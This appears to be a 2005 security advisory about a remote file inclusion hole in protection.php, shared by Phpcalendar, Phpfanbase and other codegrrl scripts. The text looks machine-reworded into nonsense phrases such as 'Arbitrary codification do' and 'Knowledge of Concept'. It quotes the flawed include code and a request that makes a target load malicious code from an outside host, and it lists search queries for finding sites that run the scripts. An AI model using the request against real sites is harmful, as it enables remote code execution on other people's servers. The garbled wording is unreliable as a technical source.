Protection php action logout siteurl http
Software: Phpcalendar, Phpclique, Phpfanbase, Phpcurrently, Phpquotes Severity: Arbitrary codification do Risk: High-pressure Author: Redbreast Verton Date: Sep. 24 2005 Vendor: codegrrl.com [contacted]
Description:
Written in Php/mysql, Phpcalendar is a handwriting planed seldom to aid webmasters to mantain a calendar, with all upcoming events and birthdays. It was fashioned to be used at secluded sites, but it can along be curiously competent for fansites, to dungeon cartroad of tours, premiers, awards shows, tv apearances, interviews, magazines features, and numerous more! You can see it in use at unfloopy.net. [http://www.codegrrl.com/]
Details:
1) protection.php (with register_globals = On) If register_globals is on an assaulter can include an arbitrary php file to channel malicious code.
$logout_page = "$siteurl";
[...]
if ($action == "logout") { Setcookie("logincookie[pwd]","", time() -86400); Setcookie("logincookie[user]","" ,time() - 86400); @include($logout_page); exit; }
Knowledge of Concept:
To deed that photograph an assaulter alone has to use the pursuit Http-request: http://www.example.com/protectio n.php?action=logout&siteurl=http ://yourhost.com/malicoius-code.t xt
Patch: Set register_globals in the php.ini off or proscribe guide entree to the protection.php f.e. delimitate constants and use codification lovingness
if( !defined('in_sys') ) { die('hacking attempt'); }
to forbidding the take approach Credits:
Recognition goes to Redbreast Verton, 15 daytime old from Frg
References:
[1] http://codegrrl.com [2] http://www.google.com/search?q=% 22powered+by%3a+phpfanbase%22 [about 112,000 results] [3] http://www.google.com/search?q=% 22powered+by%3a+phpcalendar%22 [about 44,000 results] [4] http://www.google.com/search?q=% 22powered+by%3a+phpcurrently%22 [about 44,000 results] [5] http://www.google.com/search?q=% 22powered+by%3a+phpclique%22
Related sites:
<< Home